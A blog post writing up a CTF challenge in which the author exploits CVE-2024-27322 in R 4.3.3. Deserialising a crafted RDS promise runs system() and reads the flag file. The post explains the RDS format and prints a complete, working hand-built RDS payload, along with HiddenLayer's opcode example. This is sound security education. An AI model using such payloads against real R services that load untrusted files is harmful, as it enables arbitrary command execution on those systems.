Written by Andrew Donnellan
on 2024-10-25, 18:45 [+11:00]

BSides Canberra CTF 2024: ServeR

Last month, I went to BSides Canberra, an offensively-minded information security conference which is also the most important regular technical conference in Canberra and attracts plenty of people from both infosec and the broader Canberra tech community.

As usual, there was a CTF organised by the Cybears crew. I formed a team with three of my uni and church friends, and we came a respectable 11th (out of a total of 198 teams who scored at least one flag), which I am very happy with.

This post is a writeup of the most interesting challenge I solved, ServeR.

NOTE: This challenge involves R, a language I've never worked with before and have no idea about beyond what is written in this post. Do not trust my explanations to be entirely accurate, only accurate enough to get the flag. Corrections and clarifications welcome!

EDIT (2024-10-26): It turns out that HiddenLayer has released HiddenPromise, a Python package to manipulate RDS files, which is what they used in their example code. For some reason, it seems the only way to find this is to search their GitHub organisation - they didn't link this tool from their blog post or anywhere else as far as I can tell. Thanks to Ashley in the Cybears Discord server for pointing this out to me!

The challenge

"I created a new service using R to calculate some statistics. Just give it some serialised R data to work on. R must be safe from bugs right? It was created for science!"

You are given the URL of a web server providing an R statistics service, where you can upload what I assume from the question must be serialised R data, and it will give you some summary statistics (mean, standard deviation and median).

It's pretty obvious that we're going to be looking for a serialisation bug: serialisation and deserialisation are notorious sources of very interesting bugs.

Helpfully, we've also been given the code to the site, in a tarball that we can download. There's a Dockerfile:

FROM r-base:4.3.3

RUN apt update && apt install -y python3 python3-flask

WORKDIR /serve_r

COPY flag.txt ./
COPY run_r.py ./
COPY stats.R ./
COPY static ./static/

EXPOSE 8080/tcp
ENTRYPOINT ["python3", "run_r.py"]

The web part is implemented in Python with Flask, accepting the input file via a POST request, writing it to a temporary file, and shelling out to R:

import os
import subprocess
import tempfile
from flask import Flask, request

app = Flask(__name__, static_folder="./static")


@app.route("/", methods=["GET", "POST"])
def index():
    if request.method == "POST":
        f = request.files["file"]
        data = f.stream.read()
        f.close()

        with tempfile.NamedTemporaryFile("w+b", delete_on_close=False) as rds_file:
            rds_file.write(data)
            rds_file.close()

            r_out = subprocess.run(
                ["R", "--vanilla", "-s", "-f", "stats.R", "--args", rds_file.name],
                close_fds=True,
                shell=False,
                stdout=subprocess.PIPE,
            )

        return r_out.stdout.decode("utf-8")

    else:
        return app.send_static_file("index.html")


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8080, debug=False)

And the core of the service is a short piece of R code that reads in the file and outputs some HTML with the stats:

fname = commandArgs(TRUE)[1];
data <- readRDS(fname);

cat('<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Stats</title>
</head>
<body>
    <h1>Stats</h1>')
cat(c("<p>Mean: ", as.character(mean(data)), "</p>\n"));
cat(c("<p>Std. Deviation: ", as.character(sd(data)), "</p>\n"));
cat(c("<p>Median: ", as.character(median(data)), "</p>\n"));
cat('</body>
</html>')

I start the Docker container and take a look:

The index page

Having never used R before, I install it, then Google around and find out you can serialise data in the RDS format. I fire up R and create a test file with a single number:

> x=5
> saveRDS(x, file="test.rds", ascii=TRUE, compress=FALSE)

Then I upload it, and sure enough, I get some very uninteresting statistics:

Results of a test file containing a single number

The goal, as always with a CTF, is to get the hidden flag. The handout tarball has a file called flag.txt... but how do we get it?

What's a deserialisation vulnerability?

Serialisation is the process of taking an object and turning it into a sequence of bytes in some structured format that can be saved to disk or transmitted over a network and later be turned back into an object (or deserialised). Examples of serialisation include saving a document in a word processor, adding data to a database stored on disk, or converting a dictionary/hashmap into a format like JSON or XML. OWASP's Deserialization Cheat Sheet is a good summary of different kinds of common deserialisation issues.

A particularly interesting type of serialisation is the object serialisation provided natively by many object-oriented programming languages, such as Java or Python. These native serialisation features allow the serialisation of most kinds of objects that can be represented in the language - not just integers, floats, strings, lists and dictionaries, but arbitrary objects and even things like references to functions. This flexibility can be incredibly useful, but also means that deserialising untrusted, user-controlled input can be very dangerous.

The RDS format is R's version of this, and as we can see from the code, the challenge server will happily deserialise any RDS file we give it. Let's see how we can exploit this.

Finding a vulnerability

Using a sophisticated hacker dark web research tool called Google, we search for "R deserialisation vulnerability".

Clicking the top result gives us an excellent blog post on CVE-2024-27322, an issue discovered by researchers at HiddenLayer back in April.

Before we start spending much time figuring out how to exploit this bug, we skim through the post to find that it has been patched in R 4.4.0. Conveniently for us, the supplied Dockerfile says...

FROM r-base:4.3.3

In a CTF challenge, seeing that you're using the last version of the software immediately before a vulnerability was patched is definitely an indicator that you might have found the vulnerability you need. Let's read a bit more.

CVE-2024-27322

The HiddenLayer researchers discovered that it's possible to create a malicious RDS file that, when loaded, will give you an object that executes arbitrary code as soon as it is first referenced.

The trick here involves promises, a special type of R object used for lazy evaluation. An R promise is an object that stores an expression that isn't evaluated until the promise is accessed at a later point. That expression can be any kind of expression - including a function call.

I'm reasonably certain that if you're creating an RDS file, in R 4.3.3, by using the supplied serialisation functions (e.g. saveRDS()), there's no way to serialise an unevaluated promise - by accessing the promise during serialisation, you cause it to be evaluated. The R Language Definition says:

Within the R language, promise objects are almost only seen implicitly: actual function arguments are of this type. There is also a delayedAssign function that will make a promise out of an expression. There is generally no way in R code to check whether an object is a promise or not, nor is there a way to use R code to determine the environment of a promise.

There's not really any legitimate reason why you would want to serialise a promise, and you're not supposed to be able to do it.

However, this doesn't mean that the RDS format can't represent a promise: the researchers realised that you can manually construct a unevaluated promise object in an RDS file. When the RDS file is loaded, the readRDS() function will return this promise, and the promise will be evaluated as soon as the object is referenced for the first time.

Why does this matter from a security perspective? The expression to be evaluated can be whatever we want - and the example given in HiddenLayer's blog post is an expression that references the system() function, which invokes the shell with whatever shell command we want, and returns the output of the command. Reasonable programmers who are calling readRDS() might expect that a bad RDS file might give them objects they weren't expecting, but they're probably not thinking about the idea that by merely accessing the returned object, they may be executing arbitrary user-supplied code. As the R Language Definition says, you can't even check if the returned object is a promise or not.

In R 4.4 onwards, this issue is fixed by erroring out if you try to deserialise an RDS file containing a promise.

The example exploit

Helpfully, the researchers at HiddenLayer provided an example of the structure of a malicious RDS file. However, rather than providing an actual RDS file, their example appears to be the input to some kind of tooling they've built to experiment with the RDS format (I haven't seen the term "opcode" used elsewhere in relation to RDS, though if I'm wrong please let me know in the comments!):

EDIT (2024-10-26): The tooling in question is HiddenPromise, which I simply didn't find at the time!

Opcode(TYPES.PROMSXP, 0, False, False, False,None,False),
Opcode(TYPES.UNBOUNDVALUE_SXP, 0, False, False, False,None,False),
Opcode(TYPES.LANGSXP, 0, False, False, False,None,False),
Opcode(TYPES.SYMSXP, 0, False, False, False,None,False),
Opcode(TYPES.CHARSXP, 64, False, False, False,"system",False),
Opcode(TYPES.LISTSXP, 0, False, False, False,None,False),
Opcode(TYPES.STRSXP, 0, False, False, False,1,False),
Opcode(TYPES.CHARSXP, 64, False, False, False,'echo "pwned by HiddenLayer"',False),
Opcode(TYPES.NILVALUE_SXP, 0, False, False, False,None,False),

Even without understanding much about R or RDS, we can start to see what's going on here: a "PROMSXP" sounds an awful lot like a "promise", and we can see the CHARSXPs representing the name of the system() function and the argument being passed to it.

Our goal is to create our own version of this, as an RDS file, that gets us the flag. To turn this into RDS, we're going to need to figure out how this corresponds to the format.

The RDS format

The most useful introduction to the RDS format that I managed to find is a blog post by Danielle Navarro. I won't repeat everything she explains here, so go read that post for more.

In addition to Danielle's blog post, I also played around a bit with using saveRDS() to generate my own RDS files, and looking at them in an editor to see what changed as I changed the data I was serialising. I also had to look a bit at the R Internals Manual and the R source code.

The most important things to note:

Conveniently, RDS comes in both binary and ASCII variants - the binary variant gives you smaller files, while the ASCII variant is much easier for us to play with using nothing more than a standard text editor. You can also enable or disable gzip compression - disabling compression is easier for us to play with.
In the ASCII format, data is delimited using newlines.
There is a header consisting of 6 elements - ASCII vs binary mode, the format version, the R version used to write the file, the minimum R version needed to write the file, the number of characters in the string that describes the text encoding, and a string describing the text encoding (e.g. 'UTF-8').
After the header, we get the serialised object. An R object is internally represented as a SEXP (a name inspired by the Lisp S-expression) pointing to a SEXPREC node. A SEXPREC has a SEXPTYPE, which tells us the type of object we're dealing with, and then some attributes and fields if applicable. In ASCII-mode RDS, this is represented using one line containing an integer that combines both the SEXPTYPE and flags, and then separate lines for each field. If a field is a pointer to another node, the child node is recursively written out into the RDS file at that point.

So what does my (ASCII mode, uncompressed) test.rds file, containing the single integer 5, look like?

The first six lines of this are the header:

A               # ASCII mode
3               # format version 3
263169          # written with R version 4.4.1 (the version I happened to have on my laptop outside the CTF challenge container)
197888          # minimum R version that can read this is 3.5
5               # 5 characters in next line
UTF-8           # text encoding

Then we get to the actual content.

14
1
5

If we look up the first line of the content, 14, in the SEXPTYPEs section of the R Internals Manual, we find that it is a REALSXP, or "numeric vector". A REALSXP consists of "length, truelength followed by a block of C doubles". It seems to me that the following line, 1, is the length, and perhaps the "truelength" is some internal field that doesn't exist in the RDS serialised version of a REALSXP, but I'm not sure. We then have a single line containing the actual value, 5.

Crafting our own exploit

We want to convert HiddenLayer's example to an actual RDS file, and change the system() argument to cat flag.txt in order to retrieve the flag.

We start with the standard six lines of the RDS header, per the previous section, copy-pasted from an authentic RDS file. That bit's easy. Now the hard part: figuring out how to encode the SEXPs that make up the promise object. This took quite a bit of trial and error and experimentation.

To figure out how the sequence of "opcodes" in the example fit together into something resembling a syntax tree, I had to stare at the R Internals Manual some more to see what each type of SEXP contains. The types of SEXP we need for the example are:

PROMSXP - represents a promise
UNBOUNDVALUE_SXP - this doesn't appear in the R Internals Manual list of SEXPTYPEs, so I had to look at serialize.c in the R source - the source explains that it's an "administrative" value used to represent special objects or control information rather than an actual SEXP
LANGSXP - special type of LISTSXP (see below) used only for function calls. The CAR and CDR point to the function name and a list of function arguments respectively.
SYMSXP - represents a symbol
CHARSXP - represents a single character string (length field followed by the string)
LISTSXP - represents a list (in the Lisp tradition, it's a pointer to the head of the list (CAR) and then another pointer (CDR) to another LISTSXP containing the rest of the list, or NULL if it's the end of the list)
STRSXP - represents a character vector (length field containing the number of strings, followed by pointers to CHARSXPs)
NILVALUE_SXP - like UNBOUNDVALUE_SXP, this is also an administrative SEXPTYPE to represent NULL

With the knowledge from the R Internals Manual, we can arrange the list of opcodes from the HiddenLayer example into a tree corresponding to the SEXPs.

Below is a slightly cleaned up version of the notes I wrote for myself at the time. The question marks represent fields that I didn't end up explicitly representing in the RDS - I imagine they must only be used in the internal representation and thus don't need to be serialised, but don't trust my explanation of this.

PROMSXP
- value:
    UNBOUNDVALUE_SXP
- expression:
    LANGSXP
    - car:
       SYMSXP
         - printname:
           CHARSXP
             - length: 6
             "system"
         [- symvalue??]
         [- internal??]
    - cdr:
       LISTSXP
       - car:
         STRSXP
           - length: 1
           [- truelength??]
           CHARSXP
             - length: 12
             [- truelength??]
             "cat flag.txt"
       - cdr:
         NILVALUE_SXP

Now that we more or less understand how the various SEXPs fit together in a tree, we now have to convert the SEXPTYPEs into the numerical values found in the R Internals Manual and the source code, and put all the fields and values in the right spots.

This took a fair bit of trial and error, and using saveRDS() on various types of objects so I could see what a normal RDS file looks like. I didn't write any scripts to do anything fancy - I edited the RDS directly in a text editor, then used readRDS() to see what happened, and iterated until I had something that worked. I also didn't spend too much time trying to actually understand how the serialisation code works - I only looked there when I was out of other options to understand what was going on.

Eventually, I came up with this:

5               # SEXPTYPE = PROMSXP
252             # SEXPTYPE = UNBOUNDVALUE_SXP
6               # SEXPTYPE = LANGSEXP
1               # SEXPTYPE = SYMSXP
9               # SEXPTYPE = CHARSXP
6               # length = 6 characters
system          # function name
2               # SEXPTYPE = LISTSXP
16              # SEXPTYPE = STRSXP
1               # length = 1 string
9               # SEXPTYPE = CHARSXP
12              # length = 12 characters
cat flag.txt    # argument to system()
254             # SEXPTYPE = NILVALUE_SXP

Our final exploit

Putting all this together, we have our final exploit:

A
3
263169
197888
5
UTF-8
5
252
6
1
9
6
system
2
16
1
9
12
cat flag.txt
254

We save this as pwned.rds, upload it to the server, and...

Statistical calculator displaying the flag

This flag scored us 498 out of our total of 5,106 points!

It was 12:13am, and I still did over an hour more work on flags before going to bed so I could get there in time for the 9am keynote on the final day...

Now that the CTF is over, we can see the official solution, which involves a Python script that lets you express each relevant type of SEXP as a Python object and then serialise them. Far fancier than my handcrafted approach.

Acknowledgements

Thanks to the Cybears team for running a great CTF, the rest of the BSides Canberra team for running the rest of the conference, the authors of the various blog posts and manuals I read, and my three teammates for their contribution to our 11th place finish!

The Cybears have generously released the source code to this year's CTF challenges, including solutions.

Discussion and feedback

Top →